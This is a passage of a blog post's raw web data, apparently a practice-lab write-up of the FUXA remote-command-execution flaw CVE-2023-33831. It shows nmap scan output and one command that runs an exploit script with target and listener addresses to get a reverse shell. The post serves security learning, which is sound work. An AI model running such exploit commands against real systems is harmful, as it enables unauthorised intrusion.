#FFCB6B\">PORT<\/span><span style=\"color: #EEFFFF\">     <\/span><span style=\"color: #C3E88D\">STATE<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">SERVICE<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">VERSION<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">22\/tcp<\/span><span style=\"color: #EEFFFF\">   <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #EEFFFF\">  <\/span><span style=\"color: #C3E88D\">ssh<\/span><span style=\"color: #EEFFFF\">     <\/span><span style=\"color: #C3E88D\">OpenSSH<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #F78C6C\">8.2<\/span><span style=\"color: #C3E88D\">p1<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">Ubuntu<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #F78C6C\">4<\/span><span style=\"color: #C3E88D\">ubuntu0.9<\/span><span style=\"color: #EEFFFF\"> (Ubuntu <\/span><span style=\"color: #C3E88D\">Linux<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #FFCB6B\">protocol<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #F78C6C\">2.0<\/span><span style=\"color: #EEFFFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #FFCB6B\">ssh-hostkey:<\/span><span style=\"color: #EEFFFF\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #EEFFFF\">   <\/span><span style=\"color: #FFCB6B\">3072<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #F78C6C\">62<\/span><span style=\"color: #C3E88D\">:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38<\/span><span style=\"color: #EEFFFF\"> (RSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #EEFFFF\">   <\/span><span style=\"color: #FFCB6B\">256<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53<\/span><span style=\"color: #EEFFFF\"> (ECDSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #EEFFFF\">  <\/span><span style=\"color: #F78C6C\">256<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #F78C6C\">83<\/span><span style=\"color: #C3E88D\">:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8<\/span><span style=\"color: #EEFFFF\"> (ED25519)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">1881\/tcp<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #EEFFFF\">  <\/span><span style=\"color: #C3E88D\">http<\/span><span style=\"color: #EEFFFF\">    <\/span><span style=\"color: #C3E88D\">Node.js<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">Express<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">framework<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-title:<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">FUXA<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-cors:<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">GET<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">POST<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">PUT<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">DELETE<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Service<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">Info:<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">OS:<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">Linux<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #FFCB6B\">CPE:<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">cpe:\/o:linux:linux_kernel<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Service<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">detection<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">performed.<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">Please<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">report<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">any<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">incorrect<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">results<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">at<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">https:\/\/nmap.org\/submit\/<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Nmap<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">done:<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #F78C6C\">1<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">IP<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">address<\/span><span style=\"color: #EEFFFF\"> (1 <\/span><span style=\"color: #C3E88D\">host<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">up<\/span><span style=\"color: #EEFFFF\">) scanned <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #EEFFFF\"> 13.89 seconds<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:23px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can see that FUXA is running on port 1881. We have all the information we need to run our script now. Let&#8217;s run the script now and obtain a shell on the machine!<\/p>\n\n\n\n<div style=\"height:24px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#212121\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/\u2026\/Practice\/Linux\/CVE-2023-33831\/Unauthenticated-RCE-FUXA-CVE-2023-33831]\n\u2514\u2500$ python3 CVE-2023-33831.py --rhost 192.168.168.35 --rport 1881 --lhost 192.168.45.234 --lport 80\n\" style=\"color:#EEFFFF;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-darker\" style=\"background-color: #212121\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #EEFFFF\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #EEFFFF\">~\/\u2026\/Practice\/Linux\/CVE-2023-33831\/Unauthenticated-RCE-FUXA-CVE-2023-33831<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">python3<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">CVE-2023-33831.py<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">--rhost<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #F78C6C\">192.168<\/span><span style=\"color: #C3E88D\">.168.35<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">--rport<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #F78C6C\">1881<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">--lhost<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #F78C6C\">192.168<\/span><span style=\"color: #C3E88D\">.45.234<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #C3E88D\">--lport<\/span><span style=\"color: #EEFFFF\"> <\/span><span style=\"color: #F78C6C\">80<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:29px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"167\" data-attachment-id=\"627\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/05\/09\/cve-2023-33831\/image-1-4\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image-1.png?fit=1156%2C188&amp;ssl=1\" data-orig-size=\"1156,188\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image-1.png?fit=1024%2C167&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image-1.png?resize=1024%2C167&#038;ssl=1\" alt=\"\" class=\"wp-image-627\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image-1.png?resize=1024%2C167&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image-1.png?resize=300%2C49&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image-1.png?resize=768%2C125&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/05\/image-1.png?w=1156&amp;ssl=1 1156w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>This vulnerability allowed remote command execution (RCE) vulnerability in the \/api\/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request. This is due to lack of control or sanitization on inputs that can be controlled by users, thus allowing the use of dangerous methods that can be scaled for [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1,49,11,39],"tags":[],"class_list":["post-625","post","type-post","status-publish","format-standard","hentry","category-blog","category-ctf","category-ctf-write-ups","category-cve"],"aioseo_notices":[],"featured_image_src":null,"author_info":{"display_name":"ishsome","author_link":"https:\/\/blog.ishsome.com\/index.php\/author\/e5c77740144cd4a8\/"},"jetpack_featured_media_url":"","jetpack-related-posts":[{"id":584,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/03\/03\/moniker-link-cve-2024-21413\/","url_meta":{"origin":625,"position":0},"title":"Moniker Link (CVE-2024-21413)","author":"ishsome","date":"March 3, 2024","format":false,"excerpt":"On February 13th, 2024, Microsoft announced a Microsoft Outlook RCE & credential leak vulnerability with the assigned CVE of CVE-2024-21413 (Moniker Link). Haifei Li of Check Point Research is credited with discovering the vulnerability. The vulnerability bypasses Outlook's security mechanisms when handing a specific type of hyperlink known as a\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/03\/image-1.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":414,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/01\/gitlab-cve-2023-7028\/","url_meta":{"origin":625,"position":1},"title":"GitLab CVE-2023-7028","author":"ishsome","date":"February 1, 2024","format":false,"excerpt":"This blog is based on TryHackMe's room on GitLab CVE-2023-7028. Learning Objectives Exploit a GitLab CE instance through CVE 2023-7028 How the exploit works Protection and mitigation measures What is GitLab? GitLab is a renowned and widely adopted web-based repository manager that provides a comprehensive platform for source code management,\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-1.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":434,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/03\/what-is-log-poisoning\/","url_meta":{"origin":625,"position":2},"title":"What Is Log Poisoning?","author":"ishsome","date":"February 3, 2024","format":false,"excerpt":"Logs are records generated by various software applications, operating systems, and network devices to keep track of events and activities. They are essential for monitoring, troubleshooting, and security analysis. Log poisoning typically refers to malicious activities or techniques aimed at manipulating or contaminating log files in computer systems. Log poisoning\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":306,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/27\/http-request-smuggling\/","url_meta":{"origin":625,"position":3},"title":"HTTP Request Smuggling","author":"ishsome","date":"January 27, 2024","format":false,"excerpt":"This blog is based on the HHTP Request Smuggling room from TryHackMe. What is HTTP Request Smuggling? HTTP Request Smuggling is a vulnerability that arises when there are mismatches in different web infrastructure components. This includes proxies, load balancers, and servers that interpret the boundaries of HTTP requests. Request splitting\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=1050%2C600&ssl=1 3x"},"classes":[]},{"id":103,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/","url_meta":{"origin":625,"position":4},"title":"TryHackMe: Umbrella","author":"ishsome","date":"January 24, 2024","format":false,"excerpt":"Umbrella from TryHackMe is a Linux machine with multiple misconfigurations. To get a foothold, we need to perform enumeration on the Docker Registry and obtain credentials for the MySQL database. By accessing the DB, we can get usernames and passwords for multiple users to log in to a webpage and\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":359,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/28\/tryhackme-reset\/","url_meta":{"origin":625,"position":5},"title":"TryHackMe: Reset","author":"ishsome","date":"January 28, 2024","format":false,"excerpt":"Reset is a Windows machine that is part of a domain and consists of many misconfigurations. Our goal is to perform a Pentest as a Red Teamer and exploit the misconfigurations to become the Administrator on the machine. We will begin our enumeration with NMAP as usual. NMAP \u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset] \u2514\u2500$\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=1400%2C800&ssl=1 4x"},"classes":[]}],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/625","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/comments?post=625"}],"version-history":[{"count":2,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/625\/revisions"}],"predecessor-version":[{"id":629,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/625\/revisions\/629"}],"wp:attachment":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/media?parent=625"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/categories?post=625"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/tags?post=625"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}